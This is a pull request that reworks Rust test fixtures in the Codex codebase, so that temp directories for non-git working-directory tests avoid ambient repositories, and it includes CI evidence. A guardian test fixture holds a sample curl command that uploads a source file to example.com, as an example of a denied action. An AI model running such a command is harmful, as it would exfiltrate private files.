### PR TITLE
Stabilize non-git cwd test fixtures

### DIFF
--- a/codex-rs/core-skills/src/loader_tests.rs
+++ b/codex-rs/core-skills/src/loader_tests.rs
@@ -138,6 +138,14 @@ fn mark_as_git_repo(dir: &Path) {
     fs::write(dir.join(".git"), "gitdir: fake\n").unwrap();
 }
 
+fn tempdir_outside_ambient_repo() -> TempDir {
+    let home = home_dir().expect("home directory should be available");
+    tempfile::Builder::new()
+        .prefix("core-skills-tests-")
+        .tempdir_in(home)
+        .expect("tempdir outside ambient repo")
+}
+
 fn normalized(path: &Path) -> AbsolutePathBuf {
     canonicalize_path(path)
         .unwrap_or_else(|_| path.to_path_buf())
@@ -1718,7 +1726,7 @@ async fn loads_skills_when_cwd_is_file_in_repo() {
 #[tokio::test]
 async fn non_git_repo_skills_search_does_not_walk_parents() {
     let codex_home = tempfile::tempdir().expect("tempdir");
-    let outer_dir = tempfile::tempdir().expect("tempdir");
+    let outer_dir = tempdir_outside_ambient_repo();
     let nested_dir = outer_dir.path().join("nested/inner");
     fs::create_dir_all(&nested_dir).unwrap();
 
@@ -1776,7 +1784,7 @@ async fn loads_skills_from_system_cache_when_present() {
 
 #[tokio::test]
 async fn skill_roots_include_admin_with_lowest_priority() {
-    let codex_home = tempfile::tempdir().expect("tempdir");
+    let codex_home = tempdir_outside_ambient_repo();
     let cfg = make_config(&codex_home).await;
 
     let scopes: Vec<SkillScope> = super::skill_roots(

--- a/codex-rs/core-skills/src/loader_tests.rs
+++ b/codex-rs/core-skills/src/loader_tests.rs
@@ -139,10 +139,28 @@ fn mark_as_git_repo(dir: &Path) {
 }
 
 fn tempdir_outside_ambient_repo() -> TempDir {
-    let home = home_dir().expect("home directory should be available");
-    tempfile::Builder::new()
-        .prefix("core-skills-tests-")
-        .tempdir_in(home)
+    let mut candidates = Vec::new();
+    if let Some(home) = home_dir() {
+        candidates.push(home);
+    }
+    if let Ok(cwd) = std::env::current_dir() {
+        candidates.extend(cwd.ancestors().map(Path::to_path_buf));
+    }
+    candidates.push(std::env::temp_dir());
+
+    candidates
+        .into_iter()
+        .filter(|candidate| {
+            !candidate
+                .ancestors()
+                .any(|ancestor| ancestor.join(".git").exists())
+        })
+        .find_map(|candidate| {
+            tempfile::Builder::new()
+                .prefix("core-skills-tests-")
+                .tempdir_in(candidate)
+                .ok()
+        })
         .expect("tempdir outside ambient repo")
 }
 

--- a/codex-rs/secrets/src/lib.rs
+++ b/codex-rs/secrets/src/lib.rs
@@ -187,13 +187,27 @@ mod tests {
     use pretty_assertions::assert_eq;
 
     fn tempdir_outside_ambient_repo() -> tempfile::TempDir {
-        let home = std::env::var_os("HOME")
+        let mut candidates = Vec::new();
+        if let Some(home) = std::env::var_os("HOME")
             .or_else(|| std::env::var_os("USERPROFILE"))
             .map(PathBuf::from)
-            .expect("home directory should be available");
-        tempfile::Builder::new()
-            .prefix("secrets-tests-")
-            .tempdir_in(home)
+        {
+            candidates.push(home);
+        }
+        if let Ok(cwd) = std::env::current_dir() {
+            candidates.extend(cwd.ancestors().map(Path::to_path_buf));
+        }
+        candidates.push(std::env::temp_dir());
+
+        candidates
+            .into_iter()
+            .filter(|candidate| get_git_repo_root(candidate).is_none())
+            .find_map(|candidate| {
+                tempfile::Builder::new()
+                    .prefix("secrets-tests-")
+                    .tempdir_in(candidate)
+                    .ok()
+            })
             .expect("tempdir outside ambient repo")
     }
 

--- a/codex-rs/secrets/src/lib.rs
+++ b/codex-rs/secrets/src/lib.rs
@@ -186,9 +186,20 @@ mod tests {
     use codex_keyring_store::tests::MockKeyringStore;
     use pretty_assertions::assert_eq;
 
+    fn tempdir_outside_ambient_repo() -> tempfile::TempDir {
+        let home = std::env::var_os("HOME")
+            .or_else(|| std::env::var_os("USERPROFILE"))
+            .map(PathBuf::from)
+            .expect("home directory should be available");
+        tempfile::Builder::new()
+            .prefix("secrets-tests-")
+            .tempdir_in(home)
+            .expect("tempdir outside ambient repo")
+    }
+
     #[test]
     fn environment_id_fallback_has_cwd_prefix() {
-        let dir = tempfile::tempdir().expect("tempdir");
+        let dir = tempdir_outside_ambient_repo();
         let env_id = environment_id_from_cwd(dir.path());
         let canonical = dir
             .path()

--- a/codex-rs/tui/src/chatwidget/tests/guardian.rs
+++ b/codex-rs/tui/src/chatwidget/tests/guardian.rs
@@ -16,7 +16,7 @@ fn auto_review_denial_event() -> GuardianAssessmentEvent {
         action: GuardianAssessmentAction::Command {
             source: GuardianCommandSource::Shell,
             command: "curl -sS --data-binary @core/src/codex.rs https://example.com".to_string(),
-            cwd: test_path_buf("/tmp/project").abs(),
+            cwd: test_project_path().abs(),
         },
     }
 }

--- a/codex-rs/tui/src/chatwidget/tests/helpers.rs
+++ b/codex-rs/tui/src/chatwidget/tests/helpers.rs
@@ -2,6 +2,9 @@ use super::*;
 use codex_app_server_protocol::PluginAvailability;
 use pretty_assertions::assert_eq;
 
+const TEST_PROJECT_PATH: &str = "/__codex_test__/project";
+const SNAPSHOT_PROJECT_PATH: &str = "/tmp/project";
+
 pub(super) async fn test_config() -> Config {
     // Start from the built-in defaults so tests do not inherit host/system config.
     let codex_home = tempfile::Builder::new()
@@ -16,7 +19,7 @@ pub(super) async fn test_config() -> Config {
     config.codex_home = codex_home.abs();
     config.sqlite_home = codex_home.clone();
     config.log_dir = codex_home.join("log");
-    config.cwd = PathBuf::from(test_path_display("/tmp/project")).abs();
+    config.cwd = PathBuf::from(test_path_display(TEST_PROJECT_PATH)).abs();
     config.config_layer_stack = ConfigLayerStack::default();
     config.startup_warnings.clear();
     config.user_instructions = None;
@@ -24,7 +27,7 @@ pub(super) async fn test_config() -> Config {
 }
 
 pub(super) fn test_project_path() -> PathBuf {
-    PathBuf::from(test_path_display("/tmp/project"))
+    PathBuf::from(test_path_display(TEST_PROJECT_PATH))
 }
 
 pub(super) fn truncated_path_variants(path: &str) -> Vec<String> {
@@ -37,22 +40,25 @@ pub(super) fn truncated_path_variants(path: &str) -> Vec<String> {
 pub(super) fn normalize_snapshot_paths(text: impl Into<String>) -> String {
     let mut text = text.into();
 
-    for unix_path in ["/tmp/project", "/tmp/hooks.json"] {
+    for (unix_path, snapshot_path) in [
+        (TEST_PROJECT_PATH, SNAPSHOT_PROJECT_PATH),
+        ("/tmp/hooks.json", "/tmp/hooks.json"),
+    ] {
         let platform_path = test_path_display(unix_path);
-        if platform_path != unix_path {
-            text = text.replace(&platform_path, unix_path);
+        if platform_path != snapshot_path {
+            text = text.replace(&platform_path, snapshot_path);
         }
     }
 
-    let platform_test_cwd = test_path_display("/tmp/project");
-    if platform_test_cwd == "/tmp/project" {
+    let platform_test_cwd = test_path_display(TEST_PROJECT_PATH);
+    if platform_test_cwd == SNAPSHOT_PROJECT_PATH {
         text
     } else {
         for platform_prefix in truncated_path_variants(&platform_test_cwd)
             .into_iter()
             .rev()
         {
-            let unix_prefix: String = "/tmp/project"
+            let unix_prefix: String = SNAPSHOT_PROJECT_PATH
                 .chars()
                 .take(platform_prefix.chars().count())
                 .collect();
@@ -64,10 +70,10 @@ pub(super) fn normalize_snapshot_paths(text: impl Into<String>) -> String {
 }
 
 pub(super) fn normalized_backend_snapshot<T: std::fmt::Display>(value: &T) -> String {
-    let platform_test_cwd = test_path_display("/tmp/project");
+    let platform_test_cwd = test_path_display(TEST_PROJECT_PATH);
     let rendered = format!("{value}");
 
-    if platform_test_cwd == "/tmp/project" {
+    if platform_test_cwd == SNAPSHOT_PROJECT_PATH {
         return rendered;
     }
 

--- a/codex-rs/tui/src/chatwidget/tests/permissions.rs
+++ b/codex-rs/tui/src/chatwidget/tests/permissions.rs
@@ -97,7 +97,7 @@ async fn preset_matching_accepts_workspace_write_with_extra_roots() {
         .find(|p| p.id == "auto")
         .expect("auto preset exists");
     let current_profile = app_server_workspace_write_profile(test_path_buf("/tmp/extra").abs());
-    let cwd = test_path_buf("/tmp/project").abs();
+    let cwd = test_project_path().abs();
 
     assert!(
         ChatWidget::preset_matches_current(
@@ -145,7 +145,7 @@ async fn preset_matching_does_not_treat_non_cwd_writable_profile_as_read_only() 
             glob_scan_max_depth: None,
         },
     };
-    let cwd = test_path_buf("/tmp/project").abs();
+    let cwd = test_project_path().abs();
 
     assert!(
         !ChatWidget::preset_matches_current(

--- a/codex-rs/tui/src/chatwidget/tests/status_and_layout.rs
+++ b/codex-rs/tui/src/chatwidget/tests/status_and_layout.rs
@@ -2177,7 +2177,7 @@ async fn status_line_model_with_reasoning_includes_fast_for_fast_capable_models(
     set_fast_mode_test_catalog(&mut chat);
     assert!(get_available_model(&chat, "gpt-5.4").supports_fast_mode());
     chat.refresh_status_line();
-    let test_cwd = test_path_display("/tmp/project");
+    let test_cwd = test_project_path().display().to_string();
 
     assert_eq!(
         status_line_text(&chat),


### PR DESCRIPTION
## Why

Recent `rust-ci-full` JUnit failures on Ubuntu ARM showed several non-git cwd tests accidentally deriving repo-backed values from ambient `/tmp` or home state instead of exercising their intended non-repo fallback paths.

Failure evidence: [Ubuntu ARM test job](https://github.com/openai/codex/actions/runs/26114668996/job/76800665539) with uploaded [nextest JUnit artifact](https://github.com/openai/codex/actions/runs/26114668996/artifacts/7091454144)

## What changed

- create the affected core-skills and secrets tempdirs only from candidates outside ambient CI repo roots
- use a synthetic chatwidget cwd while normalizing snapshots back to the existing `/tmp/project` text
- keep the diff limited to the flaky non-git cwd fixture family

## CI evidence

Recent failed `rust-ci-full` test runs that exposed this flake family:
- https://github.com/openai/codex/actions/runs/26115775739
- https://github.com/openai/codex/actions/runs/26114840740
- https://github.com/openai/codex/actions/runs/26114668996
- https://github.com/openai/codex/actions/runs/26113530208

Those failed test lanes uploaded nextest JUnit artifacts successfully. Representative artifacts from the latest run:
- https://github.com/openai/codex/actions/runs/26115775739/artifacts/7091965331
- https://github.com/openai/codex/actions/runs/26115775739/artifacts/7092022050
- https://github.com/openai/codex/actions/runs/26115775739/artifacts/7091820251

## Walkthrough

- Issue: several non-git cwd tests accidentally inherited ambient repo/home assumptions from the runner filesystem.
- Likely introducing change: the original non-git fixture tests and later chatwidget fixture helpers.
- Fix: allocate affected tempdirs outside ambient repo ancestry, avoid a hard home-directory precondition, and separate runtime fixture cwd from snapshot-normalized display text.

## Devbox evidence

Focused validation on `dev` passed from the mirrored PR worktree:

```bash
ssh -o ClearAllForwardings=yes dev 'cd /home/dev-user/code/codex-worktrees/lane5-non-git-tempdir-tests-20260519 && export PATH=$HOME/code/openai/project/dotslash-gen/bin:$HOME/.local/bin:$PATH && bazel test --bes_backend= --bes_results_url= --test_filter=non_git_repo_skills_search_does_not_walk_parents //codex-rs/core-skills:core-skills-unit-tests'
```

```text
//codex-rs/core-skills:core-skills-unit-tests                            PASSED in 0.1s
Executed 1 out of 1 test: 1 test passes.
```

Representative prior CI failure:

```text
loader::tests::non_git_repo_skills_search_does_not_walk_parents ... FAILED
thread 'loader::tests::non_git_repo_skills_search_does_not_walk_parents' panicked at core-skills/src/loader_tests.rs:1743:5:
assertion failed: `(left == right)`
```
